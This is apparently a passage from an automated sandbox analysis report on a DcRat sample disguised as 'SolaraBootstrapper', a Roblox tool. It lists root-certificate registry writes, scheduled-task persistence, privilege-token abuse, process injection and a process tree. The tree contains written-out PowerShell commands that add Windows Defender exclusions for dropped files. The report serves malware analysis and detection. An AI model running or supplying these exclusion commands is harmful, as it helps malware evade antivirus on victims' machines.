3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 audiodg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 audiodg.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 2316 PING.EXE 2608 PING.EXE 1256 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1056 schtasks.exe 2540 schtasks.exe 1856 schtasks.exe 904 schtasks.exe 768 schtasks.exe 2200 1716 schtasks.exe 1460 schtasks.exe 1736 schtasks.exe 2600 schtasks.exe 2504 schtasks.exe 2684 schtasks.exe 2832 2752 schtasks.exe 2548 schtasks.exe 2324 schtasks.exe 3020 schtasks.exe 2132 1576 600 schtasks.exe 2324 schtasks.exe 2308 schtasks.exe 1168 schtasks.exe 2956 schtasks.exe 2080 schtasks.exe 2556 2196 schtasks.exe 2468 schtasks.exe 1712 schtasks.exe 2092 schtasks.exe 2336 schtasks.exe 2448 1360 1852 schtasks.exe 896 schtasks.exe 2504 schtasks.exe 2972 schtasks.exe 3000 schtasks.exe 2124 schtasks.exe 628 2156 schtasks.exe 2292 schtasks.exe 2664 schtasks.exe 1296 schtasks.exe 1912 schtasks.exe 2340 schtasks.exe 2880 schtasks.exe 820 1080 schtasks.exe 2660 schtasks.exe 1236 2216 2144 schtasks.exe 1700 schtasks.exe 2004 schtasks.exe 2988 schtasks.exe 2944 schtasks.exe 2028 schtasks.exe 1868 schtasks.exe 2676 schtasks.exe 628 schtasks.exe 552 schtasks.exe 2408 schtasks.exe 2832 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRefcrt.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeComContainerbrowserRefRuntime.exeRoblox.exepid process 2272 SolaraBootstrapper.exe 2272 SolaraBootstrapper.exe 2124 Refcrt.exe 2124 Refcrt.exe 788 powershell.exe 700 powershell.exe 1100 powershell.exe 1620 powershell.exe 1104 powershell.exe 964 powershell.exe 2088 powershell.exe 1056 powershell.exe 2144 powershell.exe 1904 powershell.exe 1316 powershell.exe 2908 powershell.exe 408 powershell.exe 2588 powershell.exe 484 Refcrt.exe 484 Refcrt.exe 2448 conhost.exe 2128 powershell.exe 2556 powershell.exe 560 powershell.exe 1316 powershell.exe 1772 powershell.exe 2396 powershell.exe 2336 powershell.exe 2192 powershell.exe 1364 powershell.exe 2068 powershell.exe 1724 powershell.exe 1256 powershell.exe 2132 powershell.exe 2184 powershell.exe 1520 powershell.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 2148 ComContainerbrowserRefRuntime.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe 560 Roblox.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
csrss.exeaudiodg.exewscript.exe.exepid process 1860 csrss.exe 1544 audiodg.exe 1708 wscript.exe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sddsfsdf.exeSolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.exeRefcrt.execonhost.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2736 sddsfsdf.exe Token: SeDebugPrivilege 2272 SolaraBootstrapper.exe Token: SeDebugPrivilege 2124 Refcrt.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeShutdownPrivilege 2728 msiexec.exe Token: SeIncreaseQuotaPrivilege 2728 msiexec.exe Token: SeRestorePrivilege 2956 msiexec.exe Token: SeTakeOwnershipPrivilege 2956 msiexec.exe Token: SeSecurityPrivilege 2956 msiexec.exe Token: SeCreateTokenPrivilege 2728 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2728 msiexec.exe Token: SeLockMemoryPrivilege 2728 msiexec.exe Token: SeIncreaseQuotaPrivilege 2728 msiexec.exe Token: SeMachineAccountPrivilege 2728 msiexec.exe Token: SeTcbPrivilege 2728 msiexec.exe Token: SeSecurityPrivilege 2728 msiexec.exe Token: SeTakeOwnershipPrivilege 2728 msiexec.exe Token: SeLoadDriverPrivilege 2728 msiexec.exe Token: SeSystemProfilePrivilege 2728 msiexec.exe Token: SeSystemtimePrivilege 2728 msiexec.exe Token: SeProfSingleProcessPrivilege 2728 msiexec.exe Token: SeIncBasePriorityPrivilege 2728 msiexec.exe Token: SeCreatePagefilePrivilege 2728 msiexec.exe Token: SeCreatePermanentPrivilege 2728 msiexec.exe Token: SeBackupPrivilege 2728 msiexec.exe Token: SeRestorePrivilege 2728 msiexec.exe Token: SeShutdownPrivilege 2728 msiexec.exe Token: SeDebugPrivilege 2728 msiexec.exe Token: SeAuditPrivilege 2728 msiexec.exe Token: SeSystemEnvironmentPrivilege 2728 msiexec.exe Token: SeChangeNotifyPrivilege 2728 msiexec.exe Token: SeRemoteShutdownPrivilege 2728 msiexec.exe Token: SeUndockPrivilege 2728 msiexec.exe Token: SeSyncAgentPrivilege 2728 msiexec.exe Token: SeEnableDelegationPrivilege 2728 msiexec.exe Token: SeManageVolumePrivilege 2728 msiexec.exe Token: SeImpersonatePrivilege 2728 msiexec.exe Token: SeCreateGlobalPrivilege 2728 msiexec.exe Token: SeRestorePrivilege 2956 msiexec.exe Token: SeTakeOwnershipPrivilege 2956 msiexec.exe Token: SeRestorePrivilege 2956 msiexec.exe Token: SeTakeOwnershipPrivilege 2956 msiexec.exe Token: SeRestorePrivilege 2956 msiexec.exe Token: SeTakeOwnershipPrivilege 2956 msiexec.exe Token: SeRestorePrivilege 2956 msiexec.exe Token: SeTakeOwnershipPrivilege 2956 msiexec.exe Token: SeDebugPrivilege 484 Refcrt.exe Token: SeDebugPrivilege 2448 conhost.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 560 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SolaraBootstrapper.exeYoutube.exeResult.exeFrage build.exeDCRatBuild.exedescription pid process target process PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2692 2756 SolaraBootstrapper.exe Youtube.exe PID 2756 wrote to memory of 2736 2756 SolaraBootstrapper.exe sddsfsdf.exe PID 2756 wrote to memory of 2736 2756 SolaraBootstrapper.exe sddsfsdf.exe PID 2756 wrote to memory of 2736 2756 SolaraBootstrapper.exe sddsfsdf.exe PID 2756 wrote to memory of 2736 2756 SolaraBootstrapper.exe sddsfsdf.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2544 2692 Youtube.exe Result.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 2588 2692 Youtube.exe powershell.exe PID 2692 wrote to memory of 1504 2692 Youtube.exe Bloxstrap.exe PID 2692 wrote to memory of 1504 2692 Youtube.exe Bloxstrap.exe PID 2692 wrote to memory of 1504 2692 Youtube.exe Bloxstrap.exe PID 2692 wrote to memory of 1504 2692 Youtube.exe Bloxstrap.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2544 wrote to memory of 2272 2544 Result.exe SolaraBootstrapper.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2692 wrote to memory of 2972 2692 Youtube.exe Frage build.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2544 wrote to memory of 1512 2544 Result.exe solara.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2972 wrote to memory of 820 2972 Frage build.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe PID 2588 wrote to memory of 2884 2588 DCRatBuild.exe WScript.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"1⤵
- DcRat
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 15485⤵
- Loads dropped DLL
- Program crash
PID:2204
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1512 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"5⤵PID:408
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "6⤵
- Loads dropped DLL
PID:684 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\audiodg.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsm.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\WmiPrvSE.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat"8⤵PID:2444
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:2644
-
-
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"9⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\explorer.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsass.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\csrss.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2192
-
-
